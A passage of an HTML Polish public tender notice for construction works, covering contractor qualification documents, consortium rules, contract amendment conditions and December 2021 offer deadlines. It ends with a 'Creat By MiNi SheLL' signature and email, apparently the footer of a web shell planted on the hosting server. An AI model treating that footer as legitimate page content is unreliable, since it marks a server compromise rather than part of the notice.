działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż określona przez Zamawiającego.<br/><br/>zdolności technicznej lub zawodowej:<br/>-wykazu robót budowlanych wykonanych, nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów -inne odpowiednie dokumenty. Wzór wykazu określa załącznik nr 4 do SWZ;<br/>-wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu określa załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający żąda złożenia wraz z ofertą aktualnego na dzień składania ofert oświadczenia o<br/>którym mowa w art. 125 ust. 1 w zw. z art. 266 ustawy Pzp w zakresie wskazanym przez<br/>Zamawiającego w SWZ, stanowiącego dowód potwierdzający spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe. Wzór oświadczenia określa załącznik nr 2 do<br/>SWZ.<br/>Zamawiający żąda złożenia wraz z ofertą aktualnego na dzień składania ofert oświadczenia o<br/>którym mowa w art. 125 ust. 1 w zw. z art. 266 ustawy Pzp w zakresie wskazanym przez<br/>Zamawiającego w SWZ, stanowiącego dowód potwierdzający brak podstaw wykluczenia.<br/>b) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, jaki zakres zamówienia wykonają poszczególni Wykonawcy<br/>zgodnie z art. 117 ust. 4 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze<br/>(konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo<br/>zamówień publicznych, w tym:<br/>a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie<br/>z art. 58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania<br/>w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie w<br/>ofercie dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do<br/>występowania w imieniu Wykonawców w sposób umożliwiający ich identyfikację.<br/>b) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, jaki zakres zamówienia wykonają poszczególni Wykonawcy<br/>zgodnie z art. 117 ust. 4 ustawy Pzp.<br/>c) W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia<br/>oraz spełniania warunków udziału w postępowaniu w rozdziale VI wymagane jest załączenie do<br/>oferty oświadczenia, oraz oświadczenie o spełnianiu warunków udziału w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) przedłużenie terminu wykonania zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia niekorzystnych warunków atmosferycznych powodujących - ze względów<br/>technologicznych - wstrzymanie lub przerwanie wykonywanych robót budowlanych,<br/>stanowiących przedmiot zamówienia w okresie dłuższym niż 5 następujących po sobie dni<br/>kalendarzowych - potwierdzonego pisemnie przez inspektora nadzoru, przy czym przedłużenie<br/>terminu realizacji zamówienia nastąpi o tyle dni, przez ile trwało ich wstrzymanie;<br/>2) przedłużenie terminu wykonania zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia<br/>niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu<br/>wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz<br/>akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia<br/>nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej;<br/>3) przedłużenie terminu wykonania zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania<br/>robót budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót<br/>budowlanych, stanowiących przedmiot zamówienia przez inny organ administracji publicznej, o<br/>ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi<br/>odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni,<br/>odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub<br/>zakazano prowadzenia robót budowlanych;<br/>4) przedłużenie terminu wykonania zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia kolizji z sieciami zewnętrznymi lub instalacjami nieujawnionymi w<br/>dokumentacji projektowej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni niezbędną Wykonawcy na usunięcie kolizji z sieciami zewnętrznymi lub instalacjami<br/>nieujawnionymi w dokumentacji projektowej - o ile usunięcie kolizji wymagać będzie<br/>przedłużenia terminu realizacji;<br/>5) przedłużenie terminu wykonania zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej, stanowiącej<br/>załącznik nr 2 do umowy, zmian, powodujących wstrzymanie lub przerwanie robót budowlanych,<br/>stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia<br/>nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do<br/>przeprowadzenia uzgodnień (ustaleń) z właściwymi organami, uzyskania opinii właściwych<br/>organów oraz wydania decyzji przez właściwe organy;<br/>6) przedłużenie terminu wykonania zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku oczekiwania na konieczne decyzje administracyjne, decyzje urzędowe i władz<br/>samorządowych, zmiany obowiązującego prawa, wyniki ekspertyz, wyroki sądowe itp. o ile<br/>oczekiwanie to nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy<br/>czym przedłużenie terminu wykonania zamówienia nastąpi o liczbę dni, odpowiadającą okresowi<br/>oczekiwania;<br/>7) przedłużenia terminu wykonania w zakresie niezbędnym wynikającym z konieczności<br/>wykonania robót, dodatkowych oraz zamówień określonych w art. 214 ust 1 pkt. 7 ustwy Prawo<br/>zamówień publicznych do 10% wartości Zamówienia podstawowego na warunkach<br/>obowiązującej umowy;<br/>8) zmiany powszechnie obowiązujących przepisów prawa oraz umowy o dofinansowanie w<br/>zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia<br/>stron umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com